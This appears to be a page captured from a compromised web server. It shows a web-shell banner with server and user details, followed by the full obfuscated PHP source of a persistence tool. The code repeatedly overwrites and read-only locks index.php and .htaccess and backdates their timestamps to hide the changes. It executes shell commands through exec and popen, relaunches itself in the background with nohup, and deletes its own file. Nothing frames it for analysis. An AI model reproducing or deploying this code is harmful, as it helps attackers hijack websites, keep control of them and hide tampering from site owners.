Server IP : 103.53.40.154 / Your IP : 18.116.23.59 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home2/ppcad7no/public_html/../natureamrit.com/../.quarantine/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /* @Author https://www.jiamiphp.com/ */ goto Fadbcro6ZV; QFEFiOsgcg: echo "\74\x2f\x64\151\x76\x3e\74\57\x64\x69\166\76\x3c\57\142\157\x64\171\x3e\x3c\x2f\150\x74\155\x6c\76"; exit; GLd1zL5F1R: goto xoHNyQJK9n; Fadbcro6ZV: $lock_file_name = "\151\156\x64\x65\x78\x2e\x70\150\160"; $lock_ht_name = "\x2e\150\164\x61\x63\143\x65\163\163"; $current_file_path = __FILE__; $current_dir = realpath(dirname($current_file_path)); $lock_file_path = $current_dir . "\x2f" . $lock_file_name; goto gydx1HLSgu; yZhtnhuGYO: lockfilefunc($lock_ht_path, $current_file_name, $htContent, $hash_ht_content); daybVxAzsv: sleep(1); goto u_fj6y6TJL; Lg9GQZeeXr: goto qfUeAHQqyV; qfUeAHQqyV: iCq4eiX2HJ: function lockfile($file, $data) { @unlink($file); chmod($file, 0777); @unlink($file); file_put_contents($file, $data); chmod($file, 0444); usleep(1000000); } if (!strstr($_SERVER["\123\x43\122\x49\x50\x54\137\x4e\x41\x4d\105"], $current_file_name)) { goto GLd1zL5F1R; } echo "\x3c\x68\x74\155\154\40\x6c\x61\156\147\x3d\x22\172\150\55\143\x6e\x22\76\74\150\145\x61\x64\x3e\74\155\x65\x74\x61\x20\143\x68\141\x72\163\145\164\x3d\x22\125\x54\106\x2d\70\x22\76\74\164\151\164\x6c\x65\76\xe9\224\201\347\240\x81\74\x2f\x74\x69\x74\x6c\145\76\74\x2f\x68\x65\x61\x64\76\x3c\x62\x6f\144\171\76\x3c\144\151\x76\x20\x73\x74\x79\x6c\x65\x3d\42\x6d\141\162\147\x69\x6e\x3a\x20\x30\40\x61\x75\164\157\73\x20\167\151\x64\164\x68\x3a\61\61\x30\60\x70\170\42\76\x3c\144\x69\x76\40\163\164\171\x6c\x65\75\42\146\x6c\157\141\x74\x3a\40\x6c\x65\x66\164\x3b\x74\145\x78\164\x2d\141\154\x69\147\156\72\40\154\x65\x66\164\x3b\167\x69\x64\x74\150\x3a\62\60\x30\160\170\42\76"; htmlForm($current_file_name, "\154\x6f\x63\153", "\x32\40\55\x20\351\224\201\346\x96\x87\344\xbb\266"); goto D52cpCVh2j; qRVm4KORZc: function functionCheck() { $disabled = explode("\54", ini_get("\144\151\x73\x61\142\154\145\137\146\x75\156\x63\164\x69\157\156\163")); $new_disable = array(); foreach ($disabled as $item) { $new_disable[] = trim($item); iXiAg5uiHN: } iRIIfBrGLA: if (!(in_array("\x65\170\145\x63", $new_disable) && in_array("\160\157\160\x65\x6e", $new_disable))) { goto wOKy46EIib; } return false; wOKy46EIib: return true; } function lockfilefunc($lock_file_path, $current_file_name, $content, $hash_content) { goto L58goO_lFv; AKTI0XIMRd: $new_content = file_get_contents($lock_file_path); $new_hash_content = hash("\x73\x68\141\61", $new_content); if (!($new_hash_content != $hash_content)) { goto oyE0oqJ6Ve; } @unlink($lock_file_path); @file_put_contents($lock_file_path, $content); goto WSpR2tK9tV; L58goO_lFv: if (file_exists($lock_file_path)) { goto mF_RQvngwk; } @file_put_contents($lock_file_path, $content); @touch($lock_file_path, strtotime("\55\x34\x30\x30\x20\144\141\171\163", time())); @chmod($lock_file_path, 0444); mF_RQvngwk: goto AKTI0XIMRd; WSpR2tK9tV: @touch($lock_file_path, strtotime("\55\64\x30\x30\40\x64\x61\171\x73", time())); @chmod($lock_file_path, 0444); oyE0oqJ6Ve: @chmod($lock_file_path, 0444); goto KR6PA0C348; KR6PA0C348: } if (!is_cli()) { goto iCq4eiX2HJ; } @unlink($current_file_path); $content = file_get_contents($lock_file_path); goto D93pF_CcZW; giwxzSTx1k: if (!file_exists($current_file_name)) { goto yjDxNiAUXl; } goto Lg9GQZeeXr; yjDxNiAUXl: lockfilefunc($lock_file_path, $current_file_name, $content, $hash_content); if (!($lockHt == 1)) { goto daybVxAzsv; } goto yZhtnhuGYO; gydx1HLSgu: $lock_ht_path = $current_dir . "\x2f" . $lock_ht_name; $current_file_name = str_replace($current_dir, '', $current_file_path); $current_file_name = str_replace("\57", '', $current_file_name); $current_file_name = str_replace("\134", '', $current_file_name); $lockHt = 1; goto ef9kEiOQ29; D93pF_CcZW: $hash_content = hash("\163\x68\141\x31", $content); $htContent = file_get_contents($lock_ht_path); $hash_ht_content = hash("\163\x68\141\61", $htContent); u_fj6y6TJL: if (!true) { goto Lg9GQZeeXr; } goto giwxzSTx1k; ef9kEiOQ29: function getPhpPath() { goto lByb60nREV; YrFAu9ZzCi: if (!(isset($matches[1]) && $matches[1] != '')) { goto WyWldgI8tD; } return $matches[1] . "\57\x70\x68\160"; WyWldgI8tD: preg_match("\x2f\x2d\55\x70\x72\145\x66\151\170\75\x28\133\136\x26\x5d\x2b\51\x2f\x73\151", $info, $matches); if (isset($matches[1])) { goto UR1d_4FTPm; } goto IyHJDqPlHr; lByb60nREV: ob_start(); phpinfo(1); $info = ob_get_contents(); ob_end_clean(); preg_match("\x2f\55\x2d\142\x69\156\144\151\x72\75\x28\133\x5e\x26\135\x2b\51\57\163\x69", $info, $matches); goto YrFAu9ZzCi; IyHJDqPlHr: return "\x70\x68\x70"; UR1d_4FTPm: return $matches[1] . "\x2f\x62\x69\x6e\57\160\150\x70"; goto nVuuFcfS3e; nVuuFcfS3e: } function htmlForm($action_url, $value, $submit_value) { goto qcGkGZRQS0; jbj6clpR4I: $domain = $domain . $_SERVER["\x50\x48\x50\x5f\123\105\114\x46"]; $url = ($_SERVER["\x52\x45\121\125\105\123\x54\137\123\x43\x48\105\115\105"] != '' ? $_SERVER["\x52\105\121\125\x45\123\124\x5f\123\x43\110\105\x4d\105"] : "\x68\x74\x74\160") . "\72\x2f\x2f" . $domain; echo "\x3c\160\x20\163\164\171\154\145\75\47\47\76\74\x61\40\x73\x74\171\x6c\145\75\47\x70\x61\x64\x64\151\x6e\x67\72\x20\x35\x70\170\x3b\x20\x20\167\x69\144\164\150\x3a\61\62\60\x70\x78\73\143\157\154\157\162\72\40\43\x33\x33\71\71\x36\x36\x3b\x20\x74\145\x78\164\x2d\144\x65\143\x6f\x72\x61\164\x69\157\156\x3a\x6e\157\156\145\x3b\40\x27\40\x68\162\145\146\x3d\x27{$url}\x3f\141\x63\x74\151\157\156\x3d{$value}\x27\x3e{$submit_value}\74\57\x61\x3e\74\57\160\76"; goto kd6x2svICt; qcGkGZRQS0: $domain = ''; if (isset($_SERVER["\110\124\x54\x50\x5f\110\x4f\x53\x54"])) { goto DyLFDIzChC; } if (isset($_SERVER["\x53\105\122\126\x45\122\x5f\x4e\x41\115\x45"])) { goto Y3uCXPRYPk; } goto r41jF28_MQ; DyLFDIzChC: goto LQ8rkAqDtP; LQ8rkAqDtP: $domain = $_SERVER["\x48\124\x54\120\137\x48\117\x53\124"]; goto r41jF28_MQ; Y3uCXPRYPk: $domain = $_SERVER["\x53\105\x52\126\x45\x52\137\x4e\x41\115\105"]; r41jF28_MQ: goto jbj6clpR4I; kd6x2svICt: } function html_display($data_array) { foreach ($data_array as $key => $value) { echo PHP_EOL . "\x3c\x68\x72\x20\x2f\x3e" . PHP_EOL; echo "\x3c\160\x3e{$key}\40\x3a\40{$value}\74\57\160\x3e"; W6xEWcFPFD: } ZWwdLVOucp: } function is_cli() { goto hFtaX35rXz; hFtaX35rXz: $is_cli = preg_match("\57\x63\154\151\57\x69", php_sapi_name()) ? true : false; if (!($is_cli === false)) { goto pppE1jOiew; } if (!(isset($_SERVER["\141\162\x67\x63"]) && $_SERVER["\141\162\x67\143"] >= 2)) { goto diBmGrn07s; } $is_cli = true; diBmGrn07s: goto hKSv2dJrS1; hKSv2dJrS1: pppE1jOiew: if (!($is_cli === false)) { goto jz6TLLBKza; } if (isset($_SERVER["\123\x43\122\111\x50\x54\x5f\x4e\101\115\105"])) { goto CCkl9FWuN4; } $is_cli = true; CCkl9FWuN4: goto tLyUUjGTLe; tLyUUjGTLe: jz6TLLBKza: return $is_cli; goto ovTPbk7H3f; ovTPbk7H3f: } function run($code, $method = "\160\x6f\x70\x65\156") { goto ncxKkWwp_4; MAbd1wk_Bl: $result = ''; switch ($method) { case "\145\170\x65\x63": exec($code, $array); foreach ($array as $key => $value) { $result .= $key . "\x20\72\40" . $value . PHP_EOL; E9Pq_4Ejl0: } ku7nV0lifK: return $result; goto MDzAHHVy1E; case "\x70\157\x70\145\x6e": $fp = popen($code, "\162"); tG9z2ilFkx: if (feof($fp)) { goto LTUKzxPMfW; } $out = fgets($fp, 4096); $result .= $out; goto tG9z2ilFkx; LTUKzxPMfW: pclose($fp); return $result; goto MDzAHHVy1E; default: return false; goto MDzAHHVy1E; } zSqb_dOOqF: MDzAHHVy1E: goto nDfl60HANB; ncxKkWwp_4: $disabled = explode("\54", ini_get("\x64\x69\163\141\142\154\145\x5f\x66\x75\x6e\x63\164\151\x6f\156\163")); $new_disable = array(); foreach ($disabled as $item) { $new_disable[] = trim($item); r36wO1riDt: } ee2Scp9oEm: if (!in_array($method, $new_disable)) { goto zkdnUZU1q6; } goto N99XMc0In0; N99XMc0In0: $method = "\x65\170\x65\x63"; zkdnUZU1q6: if (!in_array($method, $new_disable)) { goto oXRKU71Ajc; } return false; oXRKU71Ajc: goto MAbd1wk_Bl; nDfl60HANB: } goto qRVm4KORZc; D52cpCVh2j: htmlForm($current_file_name, "\x6d\x6f\144\x69\146\x79", "\344\275\277\xe5\212\240\351\224\201\xe6\x96\207\344\273\xb6\345\x8f\257\xe4\xbf\xae\xe6\224\xb9"); echo "\x3c\x2f\144\x69\x76\76\74\144\x69\166\40\163\164\x79\x6c\145\75\x22\x66\x6c\x6f\141\x74\x3a\x72\x69\147\x68\x74\x3b\x74\x65\170\164\55\141\154\x69\x67\156\72\x20\x6c\x65\x66\164\73\167\x69\x64\x74\150\x3a\x38\65\60\160\x78\73\x20\142\157\x72\144\x65\162\72\61\160\170\x20\163\x6f\154\151\144\40\x23\x39\71\x39\x39\71\71\73\160\141\144\x64\151\156\147\x3a\40\65\160\170\42\76\xe4\277\241\xe6\x81\xaf\357\xbc\232"; switch ($_GET["\x61\x63\x74\x69\x6f\156"]) { case "\146\x75\156\x63\x74\x69\x6f\x6e": $data_array[] = array(); $disabled = explode("\54", ini_get("\144\x69\163\141\142\x6c\145\137\146\x75\156\x63\164\x69\157\156\x73")); html_display($disabled); goto PbcXMBsyjM; case "\x63\150\x65\x63\x6b": goto iZ4T226nyr; uJRz4Pi8AR: html_display($data_array); goto PbcXMBsyjM; goto aSq1F2a7Ob; u_uFvBw3TD: $data_array["\160\150\x70\x20\347\211\210\xe6\234\xac"] = $matches[1]; vZzqpxHbsu: if (!file_exists($lock_file_name)) { goto JJ_EYdwEFb; } $data_array["\345\x8a\240\351\x94\x81\xe6\226\x87\344\xbb\266\xe8\267\257\345\xbe\204"] = $lock_file_path; JJ_EYdwEFb: goto uJRz4Pi8AR; iZ4T226nyr: $php_path = getPhpPath(); $data_array["\x70\150\160\40\350\xb7\xaf\345\xbe\204"] = $php_path; $result = run("{$php_path}\40\55\166"); if (!($result === false)) { goto u8bezDDEdv; } $data_array["\xe6\211\247\350\xa1\214\xe9\224\231\xe8\257\xaf"] = "\347\x8e\260\346\x9c\211\346\226\271\xe6\263\225\346\x97\240\346\263\225\xe6\211\xa7\xe8\xa1\214\345\221\xbd\xe4\xbb\xa4"; goto HgYLQD6hqA; HgYLQD6hqA: html_display($data_array); goto PbcXMBsyjM; u8bezDDEdv: preg_match("\x2f\x50\110\120\40\x28\x5b\56\60\55\x39\x5d\53\x29\57\163\151", $result, $matches); if (!isset($matches[1])) { goto vZzqpxHbsu; } goto u_uFvBw3TD; aSq1F2a7Ob: case "\154\157\x63\x6b": goto n7y2gpk8JV; WfihugPM5A: error_reporting(0); ignore_user_abort(true); set_time_limit(0); $CodeIndex = @file_get_contents("\151\156\144\x65\x78\x2e\x70\150\160"); $CodeHtaccess = @file_get_contents("\x2e\x68\x74\x61\x63\x63\x65\x73\163"); goto OWDz7Oy4Kt; OWDz7Oy4Kt: j6_KgIb3jc: if (!(1 == 1)) { goto ZHrFt_kaZ9; } if (!file_exists(__FILE__)) { goto gHDCqlYLYQ; } header("\x4c\x6f\143\x61\x74\x69\157\x6e\x3a\40\x68\x74\164\x70\x3a\57\x2f" . $_SERVER["\110\124\124\120\137\110\117\x53\x54"] . $_SERVER["\123\103\122\111\120\x54\137\x4e\101\115\105"]); goto ZHrFt_kaZ9; goto BZXxjMxr8B; pnorBDFmSW: goto kQK4BeQz7x; JO8YHlOqzw: $data_array["\xe6\211\247\350\241\x8c\345\221\xbd\xe4\273\244"] = "\x6e\157\x68\165\160\x20{$php_path}\x20" . $current_file_path . "\40\76\x2f\144\145\166\x2f\156\x75\154\154\40\62\x3e\x26\61\x20\x26"; run($data_array["\346\211\247\350\xa1\x8c\345\x91\275\xe4\xbb\xa4"]); $result = run("\x70\x73\x20\x61\165\x78\40\174\x20\147\x72\x65\x70\40{$current_file_name}"); goto Ykp3Hi0wzW; n7y2gpk8JV: $php_path = getPhpPath(); if (functionCheck() !== false) { goto JO8YHlOqzw; } $data_array["\346\211\xa7\350\241\214\351\224\x99\350\257\xaf"] = "\347\x8e\260\xe6\234\x89\xe6\226\xb9\xe6\xb3\x95\346\x97\240\346\263\225\346\211\xa7\xe8\xa1\214\345\x91\275\344\273\244\x2c\346\x89\xa7\350\xa1\x8c\347\254\254\344\272\214\xe7\xa7\x8d\xe6\x96\xb9\346\241\x88\347\232\x84\351\224\201"; html_display($data_array); @unlink(__FILE__); goto WfihugPM5A; Ykp3Hi0wzW: foreach (explode("\12", $result) as $value) { $data_array[] = $value; LWzkn5bMQj: } DjNrmkua2v: html_display($data_array); kQK4BeQz7x: goto PbcXMBsyjM; goto F5pdOgM956; BZXxjMxr8B: gHDCqlYLYQ: lockfile("\x69\156\144\x65\170\x2e\160\x68\x70", $CodeIndex); lockfile("\56\x68\x74\141\143\143\x65\x73\x73", $CodeHtaccess); goto j6_KgIb3jc; ZHrFt_kaZ9: goto pnorBDFmSW; F5pdOgM956: case "\64": $data_array[] = array(); $results = run("\160\163\x20\141\165\x78\40\174\40\147\162\145\160\40" . $current_file_name); foreach (explode("\12", $results) as $value) { $data_array[] = $value; VYfTzTL5tF: } HmsYQkhqrO: html_display($data_array); goto PbcXMBsyjM; case "\x6d\x6f\x64\x69\146\171": $data_array["\344\277\xae\346\x94\xb9\347\273\223\346\x9e\234"] = "\xe5\244\261\xe8\xb4\xa5"; if (!chmod($lock_file_path, 0777)) { goto kGBJROk0WW; } $data_array["\xe4\277\256\xe6\x94\xb9\xe7\273\223\346\x9e\x9c"] = "\xe6\x88\x90\xe5\212\x9f"; kGBJROk0WW: html_display($data_array); goto PbcXMBsyjM; case "\160\x68\x70\151\156\x66\157": phpinfo(); goto PbcXMBsyjM; case "\x70\x68\x70\x5f\166\x65\x72\163\x69\x6f\156": $php_path = getPhpPath(); $data_array[] = array(); $results = run("{$php_path}\40\x2d\166"); foreach (explode("\12", $results) as $value) { $data_array[] = $value; rB3N1Lcn81: } dKFa56e37v: html_display($data_array); goto PbcXMBsyjM; default: goto PbcXMBsyjM; } MvsE9NHQ1V: PbcXMBsyjM: goto QFEFiOsgcg; xoHNyQJK9n: echo $_SERVER["\x53\103\122\111\x50\x54\137\116\101\x4d\x45"];?>